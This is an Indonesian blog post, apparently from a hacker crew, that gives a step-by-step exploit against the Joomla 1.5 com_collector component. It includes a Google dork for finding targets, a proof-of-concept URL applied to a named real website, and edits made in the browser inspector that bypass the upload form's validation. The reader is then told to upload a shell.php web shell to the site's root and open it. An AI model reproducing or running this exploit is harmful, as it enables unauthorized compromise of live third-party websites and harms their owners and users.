Sekarang ane mau berbagi tentang rahasia dibalik kejamnya browser ente om.. hiks hiks... yh gk se-EXTREME yg ente bayangin sih om, tp klo om-om ini bisa pada ngembangin bisa jd tools yg sangat berbahaya... #jgn lebay deh om awed, please... hehehe...
Sekarang kita coba testing dengan memanfaatkan kelemahan joomla V 1.5 yg menggunakan com_collector. Syarat, Browser Firefox, koneksi internet, kopi n cemilan deh... buka google.co.id, lalu ketikkan dork ini,,,
Dork >>
inurl:index.php?option=com_collector
POC/Exploit >>
http://localhost/[path]/index.php?option=com_collector&view=filelist&tmpl= component&folder=&type=1
misal kita dapet >> http://www.sris.com.kg/index.php?option=com_collector&view=collection&id=2&Itemid=22&lang=en lalu kita rubah menjadi >> http://www.sris.com.kg/index.php?option=com_collector&view=filelist&tmpl=%20component&folder=&type=1
inilah screenshot-nya >>
lalu tekan ctrl + shift + i untuk membuka browser inspector sebagai tools / alat bantu kita om... lalu arahkan pointer ke tombol submit uploadnya...
lalu rubah bagian coding ini...
<input type="button" value="Start upload" onclick="javascript:if(document.adminForm.fileupload.value==''){alert('Veuillez sélectionner un fichier');}else{ submitbutton('upload')}"></input>
</div>
</td></tr>
</tbody>
</table>
<input type="hidden" value="com_collector" name="option"></input>
<input type="hidden" value="filelist" name="view"></input>
<input type="hidden" value="component" name="tmpl"></input>
<input type="hidden" value="" name="task"></input>
<input type="hidden" value="" name="folder"></input>
<input type="hidden" value="filemanager" name="controller"></input>
menjadi...
<input type="submit" value="Start upload" onclick=""></input>
</div>
</td>
</tr>
</tbody>
</table>
<input type="hidden" value="com_collector" name="option"></input>
<input type="hidden" value="filelist" name="view"></input>
<input type="hidden" value="component" name="tmpl"></input>
<input type="hidden" value="upload" name="task"></input>
<input type="hidden" value="" name="folder"></input>
<input type="hidden" value="filemanager" name="controller"></input>
lihat kan om perbedaan yg udah kita kasih, nah sekarang om bisa bedain kan coding javascript validasinya udah kita rubah, om-om skrg bisa upload shell.php langsungtanpa ragu-ragu lagi... hehe... klo udah di upload om bisa buka di alamat site.com/[nama shel.php om] karena type hidden yg nama folder yg ane stabillo hijau itu kita kosongkan, artinya file shell.php kita upload di folder utama site tersebut, kalo diisi yang lain yh berarti kasih slash sesuai folder yg ente kasih om baru akhiri url nya dengan /[shell.php]...
hehe bahaya kan om,,, nah sekarang ane lg cari buat script yang lebih bahaya lagi om.. hehe saling share ajah yah om... om-om jg bisa oprek web lain dg inspector tersebut... silakan ajah deh om oprek dengan logika om, syukur-syukur om-om dpt cara baru... hehe makasih yah sebelumnya buat IBT Crew & ZEUS TEAM...
mohon kritik n saran yah om ke ane apabila ada kesalahan, kekurangan
atau kelebihan. ane juga minta maaf apabila ane nyinggung om secara gak
sengaja melalui postingan ini, hehe namanya juga gak sengaja om...
okay, sekian dulu dari om Awed, sampai ketemu dalam postingan berikutnya. SALAM IBT OM-OM SEMUA...
Read more…
